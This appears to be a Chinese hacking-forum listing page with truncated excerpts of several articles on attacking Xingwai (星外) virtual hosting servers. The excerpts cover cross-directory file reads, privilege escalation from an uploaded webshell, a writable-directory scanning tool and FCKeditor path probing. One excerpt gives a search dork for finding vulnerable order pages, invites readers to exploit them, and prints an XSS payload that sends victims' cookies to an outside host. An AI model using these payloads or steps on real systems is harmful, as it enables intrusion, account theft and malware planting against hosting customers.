星外虚拟主机跨web目录文件读取技巧
星外虚拟主机跨目录读取文件漏洞,需要一定条件。 详细说明: 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:windows7i24IISLOG.exe c:windows7i24IISLOG2.exe c:windows7i24IISLOG3.exe c:windows7i24IISLOG4.exe c:windows7i24tool.exe...
谈对星外主机提权利用
T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外 ...
星外订单提交处过滤不严导致XSS
google or baidu 搜索 inurl:user/order.asp?type=虚拟主机 暂时只会XSS偷取cookie 可以加帐号 可以后台挂马 等等等等 自己利用吧。 XXS 偷取cookie代码 <script>document.write('<img src="https://www.webshell.cc/news.asp?msg='+document.cook...
星外目录扫描可写权限辅助工具
星外提权辅助工具提升提权成功率。原理是自动读所有可读的注册表, 并自动找注册表里面存在的路径信息,然后全部echo。结合阿D的那个 ASP目录扫描脚本效果更佳。 图2: 下载:finaly
一次星外虚拟主机的提权
今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网 www.taoyuanbao.com 小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。 手工输入 fckeditor路径 …。存在… FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanag...